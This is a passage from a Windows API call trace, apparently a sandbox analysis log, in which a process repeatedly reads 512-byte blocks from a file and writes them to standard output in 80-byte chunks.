lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.972] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.973] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.974] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0132.974] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] 
GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.975] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | 
out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, 
lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.975] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) 
returned 1 [0132.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.977] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.977] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, 
lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.978] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.978] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
